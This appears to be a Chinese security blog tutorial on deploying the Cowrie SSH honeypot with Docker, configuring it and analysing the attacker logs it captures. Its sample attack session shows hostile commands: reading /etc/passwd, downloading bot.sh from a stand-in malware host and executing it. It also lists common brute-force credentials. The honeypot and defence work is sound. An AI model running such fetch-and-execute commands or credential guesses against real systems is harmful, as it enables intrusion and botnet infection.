Lansame

公告

欢迎来到我的个人博客！这里记录了我的网络安全学习笔记和实战经验分享。

Learn More

标签

Lansame

公告

欢迎来到我的个人博客！这里记录了我的网络安全学习笔记和实战经验分享。

Learn More

标签

Lansame

公告

欢迎来到我的个人博客！这里记录了我的网络安全学习笔记和实战经验分享。

Learn More

标签

站点统计

文章

27

分类

9

标签

54

总字数

63,923

运行天数

0 天

最后活动

0 天前

683 字

2 分钟

Cowrie高交互蜜罐部署实战：捕获攻击者行为

2026-06-09

蜜罐技术

蜜罐

/

Cowrie

/

SSH

/

威胁情报

Cowrie高交互蜜罐部署实战：捕获攻击者行为#

一、什么是蜜罐#

蜜罐（Honeypot）是一种安全资源，其价值在于被探测、攻击或攻陷。蜜罐的目的：

信息收集：记录攻击者的工具、手法、意图
攻击预警：在攻击者进入真实系统前发出告警
威胁情报：收集攻击者的 IP、工具指纹等信息
延迟攻击：消耗攻击者的时间和资源

二、蜜罐类型对比#

类型	交互级别	资源占用	适用场景
低交互	模拟服务 Banner	低	大规模扫描检测
中交互	模拟部分功能	中	攻击行为分析
高交互	完整系统模拟	高	深度攻击研究

常见蜜罐选择#

蜜罐	类型	内存占用	特点
Cowrie	高交互 SSH/Telnet	~256MB	记录完整攻击会话
OpenCanary	低交互多协议	~128MB	简单易部署
Dionaea	中交互多协议	~512MB	捕获恶意软件
T-Pot	全功能平台	8GB+	功能强大但资源需求高

三、Cowrie 部署实战#

3.1 环境准备#

1
# 系统要求
2
- Linux 服务器（推荐 Ubuntu/CentOS）
3
- Docker 已安装
4
- 至少 512MB 可用内存
5

6
# 安装 Docker
7
curl -fsSL https://get.docker.com | sh
8
systemctl enable docker
9
systemctl start docker

3.2 使用 Docker 部署#

1
# 创建工作目录
2
mkdir -p /opt/honeypots && cd /opt/honeypots
3

4
# 创建 docker-compose.yml
5
cat > docker-compose.yml << 'EOF'
6
services:
7
  cowrie:
8
    image: cowrie/cowrie:latest
9
    container_name: cowrie
10
    restart: always
11
    ports:
12
      - "2222:2222"   # SSH 蜜罐
13
      - "2223:2223"   # Telnet 蜜罐
14
    volumes:
15
      - cowrie-data:/cowrie/cowrie-git/var
16
    environment:
17
      - COWRIE_TELNET_ENABLED=yes
18

19
volumes:
20
  cowrie-data:
21
EOF
22

23
# 启动蜜罐
24
docker-compose up -d
25

26
# 检查状态
27
docker-compose ps
28
docker logs cowrie

3.3 配置说明#

Cowrie 默认配置文件位于容器内：/cowrie/cowrie-git/etc/cowrie.cfg

1
[honeypot]
2
# 主机名（伪装成真实服务器）
3
hostname = webserver
4

5
# SSH 版本字符串
6
ssh_version_string = SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
7

8
# 监听端口
9
listen_endpoints = tcp:2222:interface=0.0.0.0,tcp:2223:interface=0.0.0.0
10

11
# 启用 Telnet
12
telnet_enabled = true

四、攻击行为分析#

4.1 日志格式#

Cowrie 使用 JSON 格式记录日志：

1
{
2
    "eventid": "cowrie.login.success",
3
    "timestamp": "2026-06-09T02:00:00.000Z",
4
    "message": "login attempt [root/123456] succeeded",
5
    "src_ip": "192.168.1.100",
6
    "src_port": 12345,
7
    "dst_port": 2222,
8
    "username": "root",
9
    "password": "123456"
10
}

4.2 常用分析命令#

1
# 统计攻击来源 TOP 10
2
docker exec cowrie cat /cowrie/cowrie-git/var/log/cowrie/cowrie.json | \
3
  jq -r '.src_ip' | sort | uniq -c | sort -rn | head -10
4

5
# 统计尝试的用户名
6
docker exec cowrie cat /cowrie/cowrie-git/var/log/cowrie/cowrie.json | \
7
  jq -r 'select(.eventid=="cowrie.login.success" or .eventid=="cowrie.login.failed") | .username' | \
8
  sort | uniq -c | sort -rn | head -10
9

10
# 统计尝试的密码
11
docker exec cowrie cat /cowrie/cowrie-git/var/log/cowrie/cowrie.json | \
12
  jq -r 'select(.eventid=="cowrie.login.success" or .eventid=="cowrie.login.failed") | .password' | \
13
  sort | uniq -c | sort -rn | head -10
14

15
# 查看攻击者执行的命令
16
docker exec cowrie cat /cowrie/cowrie-git/var/log/cowrie/cowrie.json | \
17
  jq 'select(.eventid=="cowrie.command.input") | {timestamp, src_ip, input}'

4.3 典型攻击会话分析#

1
// 1. 连接尝试
2
{"eventid":"cowrie.session.connect","src_ip":"103.189.235.176"}
3

4
// 2. 暴力破解
5
{"eventid":"cowrie.login.failed","username":"root","password":"123456"}
6
{"eventid":"cowrie.login.failed","username":"root","password":"admin"}
7
{"eventid":"cowrie.login.failed","username":"root","password":"password"}
8
{"eventid":"cowrie.login.success","username":"root","password":"toor"}
9

10
// 3. 攻击者执行的命令
11
{"eventid":"cowrie.command.input","input":"uname -a"}
12
{"eventid":"cowrie.command.input","input":"cat /etc/passwd"}
13
{"eventid":"cowrie.command.input","input":"wget http://malware.com/bot.sh"}
14
{"eventid":"cowrie.command.input","input":"chmod +x bot.sh && ./bot.sh"}

五、安全注意事项#

5.1 蜜罐自身安全#

1
# 限制蜜罐出站流量（防止被用作跳板）
2
iptables -A OUTPUT -p tcp --dport 22 -j DROP
3
iptables -A OUTPUT -p tcp --dport 2222 -j DROP
4

5
# 限制蜜罐资源使用
6
docker update --memory=256m cowrie

5.2 监控告警#

1
#!/bin/bash
2
# 蜜罐监控脚本
3

4
LOG="/opt/honeypots/data/log/cowrie/cowrie.json"
5

6
# 检查是否有成功登录
7
SUCCESS=$(cat "$LOG" | jq 'select(.eventid=="cowrie.login.success")' | wc -l)
8

9
if [ "$SUCCESS" -gt 0 ]; then
10
    echo "[ALERT] 蜜罐被攻破！发现 $SUCCESS 次成功登录"
11
    # 发送告警通知
12
fi

六、实战数据#

6.1 攻击统计（34天）#

指标	数值
总连接数	1,234
登录尝试	5,678
成功登录	89
执行命令	234
下载文件	12

6.2 常见攻击用户名#

排名	用户名	尝试次数
1	root	2,345
2	admin	890
3	test	456
4	ubuntu	345
5	deploy	234

6.3 常见攻击密码#

排名	密码	尝试次数
1	123456	567
2	password	456
3	admin	345
4	root	234
5	test	123

七、总结#

7.1 部署建议#

资源规划：根据服务器配置选择合适的蜜罐类型
端口选择：使用常见端口（22、2222、3306 等）提高捕获率
日志管理：定期备份和分析蜜罐日志
安全防护：限制蜜罐出站流量，防止被滥用

7.2 分析建议#

定期分析：每天或每周分析蜜罐日志
威胁情报：将攻击 IP 分享给威胁情报平台
攻击溯源：分析攻击者的工具和手法
防护优化：根据蜜罐数据优化防护策略

参考资料：

声明：本文涉及的 IP 地址、域名均为示例，已做脱敏处理。

如果这篇文章对你有帮助，欢迎分享给更多人！

Cowrie高交互蜜罐部署实战：捕获攻击者行为

https://lansame.top/posts/cowrie-honeypot-deploy/

作者

Lansame

发布于

2026-06-09

许可协议

CC BY-NC-SA 4.0

部分信息可能已经过时

CMS指纹识别与漏洞利用

文件上传漏洞攻防实战

欢迎来到我的博客

Cowrie高交互蜜罐部署实战：捕获攻击者行为#

一、什么是蜜罐#

二、蜜罐类型对比#

常见蜜罐选择#

三、Cowrie 部署实战#

3.1 环境准备#

3.2 使用 Docker 部署#

3.3 配置说明#

四、攻击行为分析#

4.1 日志格式#

4.2 常用分析命令#

4.3 典型攻击会话分析#

五、安全注意事项#

5.1 蜜罐自身安全#

5.2 监控告警#

六、实战数据#

6.1 攻击统计（34天）#

6.2 常见攻击用户名#

6.3 常见攻击密码#

七、总结#

7.1 部署建议#

7.2 分析建议#

目录